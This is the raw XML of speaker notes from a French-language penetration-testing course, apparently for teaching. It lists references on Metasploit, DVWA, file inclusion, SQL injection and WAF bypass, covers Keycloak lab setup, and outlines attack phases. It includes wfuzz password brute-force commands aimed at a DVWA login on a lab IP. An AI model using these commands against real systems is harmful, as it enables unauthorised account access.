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338" r:id="rId2"/>
    <p:sldId id="328" r:id="rId3"/>
    <p:sldId id="337" r:id="rId4"/>
    <p:sldId id="330" r:id="rId5"/>
    <p:sldId id="329" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="333" r:id="rId8"/>
    <p:sldId id="331" r:id="rId9"/>
    <p:sldId id="257" r:id="rId10"/>
    <p:sldId id="258" r:id="rId11"/>
    <p:sldId id="259" r:id="rId12"/>
    <p:sldId id="332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339" r:id="rId33"/>
    <p:sldId id="302" r:id="rId34"/>
    <p:sldId id="324" r:id="rId35"/>
    <p:sldId id="340" r:id="rId36"/>
    <p:sldId id="341" r:id="rId37"/>
    <p:sldId id="308" r:id="rId38"/>
    <p:sldId id="405" r:id="rId39"/>
    <p:sldId id="323" r:id="rId40"/>
    <p:sldId id="304" r:id="rId41"/>
    <p:sldId id="369" r:id="rId42"/>
    <p:sldId id="306" r:id="rId43"/>
    <p:sldId id="305" r:id="rId44"/>
    <p:sldId id="307" r:id="rId45"/>
    <p:sldId id="370" r:id="rId46"/>
    <p:sldId id="381" r:id="rId47"/>
    <p:sldId id="327" r:id="rId48"/>
    <p:sldId id="326" r:id="rId49"/>
    <p:sldId id="404" r:id="rId50"/>
    <p:sldId id="334" r:id="rId51"/>
    <p:sldId id="335" r:id="rId52"/>
    <p:sldId id="336" r:id="rId53"/>
    <p:sldId id="342" r:id="rId54"/>
    <p:sldId id="343" r:id="rId55"/>
    <p:sldId id="344" r:id="rId56"/>
    <p:sldId id="384" r:id="rId57"/>
    <p:sldId id="256" r:id="rId58"/>
    <p:sldId id="385" r:id="rId59"/>
    <p:sldId id="386" r:id="rId60"/>
    <p:sldId id="387" r:id="rId61"/>
    <p:sldId id="388" r:id="rId62"/>
    <p:sldId id="389" r:id="rId63"/>
    <p:sldId id="390" r:id="rId64"/>
    <p:sldId id="391" r:id="rId65"/>
    <p:sldId id="392" r:id="rId66"/>
    <p:sldId id="284" r:id="rId67"/>
    <p:sldId id="393" r:id="rId68"/>
    <p:sldId id="394" r:id="rId69"/>
    <p:sldId id="395" r:id="rId70"/>
    <p:sldId id="396" r:id="rId71"/>
    <p:sldId id="397" r:id="rId72"/>
    <p:sldId id="401" r:id="rId73"/>
    <p:sldId id="280" r:id="rId74"/>
    <p:sldId id="281" r:id="rId75"/>
    <p:sldId id="282" r:id="rId76"/>
    <p:sldId id="283" r:id="rId77"/>
    <p:sldId id="402" r:id="rId78"/>
    <p:sldId id="403" r:id="rId79"/>
    <p:sldId id="382" r:id="rId80"/>
    <p:sldId id="373" r:id="rId81"/>
    <p:sldId id="383" r:id="rId8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6257" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="23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69D8B-8B13-4D0C-8316-A11E6239572F}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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71D0F-FC3E-4B65-91AA-91E1A3FA11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442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Q3oLeY3ugbAO5LsDQij6mY3om5BJVsNl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ffsec.com/metasploit-unleashed/file-inclusion-vulnerabilities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S%C3%A9curit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Exploit_(informatique)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r.wikipedia.org/wiki/Correctif" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_zero-day#cite_note-GDT-1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88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https://github.com/amtzespinosa/lord-of-the-root-walkthrough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/abatchy17/abatchy17.github.io/blob/master/_posts/2017-02-23-oscp-like-vulnhub-vms.md</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>https://github.com/hackalcubo/CTF-Writeups/tree/main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C3AD6-069E-4418-80E4-9BD64100A97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63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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/playlist?list=PLQ3oLeY3ugbAO5LsDQij6mY3om5BJVsNl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C3AD6-069E-4418-80E4-9BD64100A97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6638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www.kali.org/tools/metasploit-framework/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.kali.org/docs/tools/starting-metasploit-framework-in-kali/#quick-way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>www.kalilinux.fr/commandes/metasploit-sur-kali-linux/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9257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3981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https://www.youtube.com/watch?v=RxGkG8HFFHs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C3AD6-069E-4418-80E4-9BD64100A970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0330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864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https://github.com/SitrakaResearchAndPOC/overflow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71D0F-FC3E-4B65-91AA-91E1A3FA117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032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7082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73D15-C5B9-DCA8-F602-196D824CB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D5876DC-23D5-A0B1-2B66-1000A8C43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C93A75-E9D1-F4A4-1D03-4232E6775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0F8E19-8706-E214-9551-6A62DCA42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9404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9090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36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871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https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-iv.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/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345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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pasword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password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515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wfuzz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"incorrect" -c -w pass.txt  -b 'security=low; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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dvwa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/vulnerabilities/brute/?username=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admin&amp;password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FUZZ&amp;Login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=Login'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wfuzz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"incorrect" -c -w pass.txt  -b 'security=medium; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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dvwa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/vulnerabilities/brute/?username=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admin&amp;password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FUZZ&amp;Login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=Login'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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wfuzz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"incorrect" -c -w pass.txt  -b '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=medium; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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dvwa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vulnerabilities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/brute/?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username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admin&amp;password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FUZZ&amp;Login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Login&amp;user_token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=****‘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310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701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7545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291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217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https://www.linkedin.com/pulse/local-file-inclusionlfi-vulnerability-remote-files-access-asif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826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File Inclusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Unleashed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.offsec.com/metasploit-unleashed/file-inclusion-vulnerabilities/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278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8904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https://mohammadm2.medium.com/rfi-af90905c8161</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.hackingarticles.in/comprehensive-guide-on-remote-file-inclusion-rfi/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1819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7387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0877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/>
              <a:t>http://altoro.testfire.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>http://altoromutual.com:8080/login.jsp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783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6525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http://portswigger.net/web-security/sql-injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@aayushtiruwa120/dvwa-sql-injection-91b4efb683e4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@cybersec.ayansharma/sql-injection-on-metasploitable-2-using-sqlmap-d50bd1359ed8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1023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5250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baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/intel/tadk-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/theonemule/docker-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v3.x%29</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/owasp/modsecurity-crs/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/wallarm/gotestwaf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/intel/tadk-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bionic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>http://www.youtube.com/watch?v=5eRxOYbaIEI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.linode.com/docs/guides/securing-nginx-with-modsecurity/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31847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https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/kh4sh3i/WAF-Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://book.hacktricks.xyz/v/fr/network-services-pentesting/pentesting-web/waf-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/nemesida-waf/waf-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://book.hacktricks.xyz/pentesting-web/proxy-waf-protections-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Interessant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>tested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) : https://www.howtoforge.com/install-modsecurity-3-with-nginx-on-ubuntu-22-04/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@sangjinn/verifying-client-ip-address-in-linode-nodebalancer-environment-using-proxy-protocol-5d012aadddd9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/codelogicx/securing-nginx-server-using-modsecurity-oswaf-7ba79906d84c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TESTER : https://github.com/SitrakaResearchAndPOC/wafmodsec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85561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https://medium.com/@evidencemonday/exploiting-vulnerabilities-in-dvwa-89b75c145d33</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Voir aussi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>videos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>cryptocat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r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8C553-6F12-4AB2-A149-3DA3E7AB04D3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515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Cain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>John ripper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Wfuzz</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>….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7656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Dans le domaine de la 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3" tooltip="Sécurité informatique"/>
              </a:rPr>
              <a:t>sécurité informatique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une </a:t>
            </a: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faille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/ </a:t>
            </a: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vulnérabilité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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zero-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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day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 également orthographiée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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0-day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 ou </a:t>
            </a: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faille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/ </a:t>
            </a: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vulnérabilité du jour zéro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="none" strike="noStrike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4"/>
              </a:rPr>
              <a:t>1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est une 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5" tooltip="Vulnérabilité informatique"/>
              </a:rPr>
              <a:t>vulnérabilité informatique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n'ayant fait l'objet d'aucune publication ou n'ayant aucun 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6" tooltip="Correctif"/>
              </a:rPr>
              <a:t>correctif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connu. L'existence d'une telle faille sur un produit informatique implique qu'aucune protection n'existe, qu'elle soit palliative ou définitive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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 terminologie « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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zero-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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day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» ne qualifie pas la gravité de la faille. Comme toute vulnérabilité, sa gravité dépend de l'importance des dégâts pouvant être occasionnés, et de l'existence d'un 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7" tooltip="Exploit (informatique)"/>
              </a:rPr>
              <a:t>exploit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c'est-à-dire d'une technique « exploitant » cette faille afin de conduire des actions indésirables sur le produit concerné.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2944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https://github.com/SitrakaResearchAndPOC/keycloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>_test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>docker run --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keycloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -p 8080:8080 -e KEYCLOAK_ADMIN=admin -e KEYCLOAK_ADMIN_PASSWORD=admin quay.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>keycloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/keycloak:24.0.2 start-dev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : 26.0.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Possible : 23.0.4, 24.0.2</a:t>
            </a:r>
          </a:p>
          <a:p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Relm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: (clic on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> corner )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Name : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>mjtech</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Enable: ON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> data : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>verified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : Yes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : milan@test.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : Milan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : Jovanovic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Configuration délégation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>securité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : possibilité avec votre base de donnée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Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>passowrd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : 123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>confirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : 123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>AS : Azure intra-id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>connect</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Aws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>cognito</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Off zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firebase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>authentication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Test : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>http://localhost:8080/realm/mjtech/acount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Cliend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (application) : end user ou backend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https://www.keycloack.org/app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(public-client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> client to server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-client menas server to server)	         	 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ClientTypeOID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  <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ClientID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : public-client  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Always display in UI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433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Phase reconnaissance : analyse d’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Phase exploitation : attaque proprement dit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>experience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et connaissance des noms d’attaques ou exploit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les CVE – les hackers opportunistes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>days</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  - La veille au zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>days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Phase post-exploitation : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> esc (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> pour s’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>integrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>noyeau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>LoL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : Living of land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Pivoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Backdooring</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>…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C3AD6-069E-4418-80E4-9BD64100A97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260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5635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https://www.youtube.com/watch?v=4t4kBkMsDbQ&amp;pp=ygUTbmV0d29ya2NodWNrICsgbm1hcA%3D%3D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Kit : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
